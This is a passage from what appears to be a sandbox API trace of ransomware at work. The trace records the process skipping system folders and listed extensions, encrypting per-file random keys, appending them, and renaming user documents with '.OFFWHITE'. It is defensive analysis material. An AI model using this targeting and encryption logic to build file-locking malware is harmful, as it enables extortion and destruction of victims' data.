HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\j4nceser.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.745] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=19413) returned 1 [0132.745] GetProcessHeap () returned 0x500000 [0132.745] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.745] GetProcessHeap () returned 0x500000 [0132.745] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.745] GetProcessHeap () returned 0x500000 [0132.745] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.745] GetProcessHeap () returned 0x500000 [0132.745] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.745] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.745] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.745] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.745] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.745] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.745] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.745] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.745] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.745] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.746] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.746] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.746] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.746] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4bd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.746] SetLastError (dwErrCode=0x0) [0132.746] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.748] GetLastError () returned 0x0 [0132.748] GetLastError () returned 0x0 [0132.748] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4cd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.748] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.749] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4dd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.749] WriteFile (in: hFile=0x21c, lpBuffer=0x53f5a8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f5a8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.749] GetProcessHeap () returned 0x500000 [0132.749] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4bd5) returned 0x55a7b8 [0132.749] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.749] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x4bd5, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x4bd5, lpOverlapped=0x0) returned 1 [0132.751] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.751] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x4bd5, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x4bd5, lpOverlapped=0x0) returned 1 [0132.751] GetProcessHeap () returned 0x500000 [0132.751] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.751] CloseHandle (hObject=0x21c) returned 1 [0132.756] GetProcessHeap () returned 0x500000 [0132.757] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.757] GetProcessHeap () returned 0x500000 [0132.757] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.757] GetProcessHeap () returned 0x500000 [0132.757] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.757] GetProcessHeap () returned 0x500000 [0132.757] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.757] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx" [0132.757] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx.OFFWHITE" [0132.757] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\j4nceser.xlsx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\J4NCeSeR.xlsx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\j4nceser.xlsx.offwhite")) returned 1 [0132.758] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdecc1b80, ftCreationTime.dwHighDateTime=0x1d5e407, ftLastAccessTime.dwLowDateTime=0x21535300, ftLastAccessTime.dwHighDateTime=0x1d5d969, ftLastWriteTime.dwLowDateTime=0x21535300, ftLastWriteTime.dwHighDateTime=0x1d5d969, nFileSizeHigh=0x0, nFileSizeLow=0x1209d, dwReserved0=0x295debc, dwReserved1=0x3703c3be, cFileName="va-_cNM.pps", cAlternateFileName="")) returned 1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2=".") returned 1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="..") returned 1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="...") returned 1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="windows") returned -1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="$recycle.bin") returned 1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="rsa") returned 1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="ntuser.dat") returned 1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="programdata") returned 1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="appdata") returned 1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="program files") returned 1 [0132.758] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="program files (x86)") returned 1 [0132.758] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" [0132.758] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\", lpString2="va-_cNM.pps" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps" [0132.758] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.758] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.758] PathFindExtensionW (pszPath="va-_cNM.pps") returned=".pps" [0132.758] lstrcmpiW (lpString1=".pps", lpString2=".exe") returned 1 [0132.758] lstrcmpiW (lpString1=".pps", lpString2=".log") returned 1 [0132.758] lstrcmpiW (lpString1=".pps", lpString2=".cab") returned 1 [0132.758] lstrcmpiW (lpString1=".pps", lpString2=".cmd") returned 1 [0132.758] lstrcmpiW (lpString1=".pps", lpString2=".com") returned 1 [0132.758] lstrcmpiW (lpString1=".pps", lpString2=".cpl") returned 1 [0132.758] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0132.758] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0132.758] lstrcmpiW (lpString1=".pps", lpString2=".url") returned -1 [0132.759] lstrcmpiW (lpString1=".pps", lpString2=".ttf") returned -1 [0132.759] lstrcmpiW (lpString1=".pps", lpString2=".mp3") returned 1 [0132.759] lstrcmpiW (lpString1=".pps", lpString2=".pif") returned 1 [0132.759] lstrcmpiW (lpString1=".pps", lpString2=".mp4") returned 1 [0132.759] lstrcmpiW (lpString1=".pps", lpString2=".OFFWHITE") returned 1 [0132.759] lstrcmpiW (lpString1=".pps", lpString2=".msi") returned 1 [0132.759] lstrcmpiW (lpString1="va-_cNM.pps", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0132.759] GetProcessHeap () returned 0x500000 [0132.759] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f5b8 [0132.759] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\va-_cnm.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.760] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=73885) returned 1 [0132.760] GetProcessHeap () returned 0x500000 [0132.760] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.760] GetProcessHeap () returned 0x500000 [0132.760] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.760] GetProcessHeap () returned 0x500000 [0132.760] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.760] GetProcessHeap () returned 0x500000 [0132.760] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.760] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.760] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.760] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.761] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.761] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.761] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.761] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.761] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.761] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.761] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.761] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.761] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.761] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1209d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.761] SetLastError (dwErrCode=0x0) [0132.761] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.763] GetLastError () returned 0x0 [0132.764] GetLastError () returned 0x0 [0132.764] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1219d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.764] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.764] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1229d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.764] WriteFile (in: hFile=0x21c, lpBuffer=0x53f5b8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f5b8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.764] GetProcessHeap () returned 0x500000 [0132.764] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1209d) returned 0x55a7b8 [0132.764] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.764] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x1209d, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x1209d, lpOverlapped=0x0) returned 1 [0132.770] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.770] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x1209d, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x1209d, lpOverlapped=0x0) returned 1 [0132.770] GetProcessHeap () returned 0x500000 [0132.770] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.770] CloseHandle (hObject=0x21c) returned 1 [0132.776] GetProcessHeap () returned 0x500000 [0132.776] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.776] GetProcessHeap () returned 0x500000 [0132.776] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.776] GetProcessHeap () returned 0x500000 [0132.776] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.776] GetProcessHeap () returned 0x500000 [0132.776] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.776] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps" [0132.776] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps.OFFWHITE" [0132.777] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\va-_cnm.pps"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\va-_cNM.pps.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\va-_cnm.pps.offwhite")) returned 1 [0132.777] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4c5dc90, ftCreationTime.dwHighDateTime=0x1d5df3e, ftLastAccessTime.dwLowDateTime=0xc3dada0, ftLastAccessTime.dwHighDateTime=0x1d5daa7, ftLastWriteTime.dwLowDateTime=0xc3dada0, ftLastWriteTime.dwHighDateTime=0x1d5daa7, nFileSizeHigh=0x0, nFileSizeLow=0xe5a1, dwReserved0=0x295debc, dwReserved1=0x3703c3be, cFileName="VCmGgM.docx", cAlternateFileName="VCMGGM~1.DOC")) returned 1 [0132.777] lstrcmpiW (lpString1="VCmGgM.docx", lpString2=".") returned 1 [0132.777] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="..") returned 1 [0132.777] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="...") returned 1 [0132.777] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="windows") returned -1 [0132.777] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="$recycle.bin") returned 1 [0132.777] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="rsa") returned 1 [0132.778] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="ntuser.dat") returned 1 [0132.778] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="programdata") returned 1 [0132.778] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="appdata") returned 1 [0132.778] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="program files") returned 1 [0132.778] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="program files (x86)") returned 1 [0132.778] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\" [0132.778] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\", lpString2="VCmGgM.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx" [0132.778] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.778] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.778] PathFindExtensionW (pszPath="VCmGgM.docx") returned=".docx" [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".log") returned -1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".cab") returned 1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".cmd") returned 1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".com") returned 1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".cpl") returned 1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".ini") returned -1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".url") returned -1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".ttf") returned -1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".mp3") returned -1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".pif") returned -1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".mp4") returned -1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".OFFWHITE") returned -1 [0132.778] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0132.778] lstrcmpiW (lpString1="VCmGgM.docx", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0132.778] GetProcessHeap () returned 0x500000 [0132.779] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f5c8 [0132.779] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\vcmggm.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.780] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=58785) returned 1 [0132.780] GetProcessHeap () returned 0x500000 [0132.780] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.780] GetProcessHeap () returned 0x500000 [0132.780] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.780] GetProcessHeap () returned 0x500000 [0132.780] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.780] GetProcessHeap () returned 0x500000 [0132.780] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.780] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.780] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.780] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.780] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.780] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.780] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.780] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.780] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.780] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.781] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.781] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.781] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.781] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xe5a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.781] SetLastError (dwErrCode=0x0) [0132.781] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.783] GetLastError () returned 0x0 [0132.783] GetLastError () returned 0x0 [0132.783] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xe6a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.783] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.783] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xe7a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.783] WriteFile (in: hFile=0x21c, lpBuffer=0x53f5c8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f5c8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.783] GetProcessHeap () returned 0x500000 [0132.783] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xe5a1) returned 0x55a7b8 [0132.784] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.784] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xe5a1, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0xe5a1, lpOverlapped=0x0) returned 1 [0132.788] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.788] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xe5a1, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0xe5a1, lpOverlapped=0x0) returned 1 [0132.788] GetProcessHeap () returned 0x500000 [0132.788] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.788] CloseHandle (hObject=0x21c) returned 1 [0132.799] GetProcessHeap () returned 0x500000 [0132.799] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.799] GetProcessHeap () returned 0x500000 [0132.799] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.799] GetProcessHeap () returned 0x500000 [0132.799] HeapFree (in: hHeap=0x500000, dwFlags=0x0, 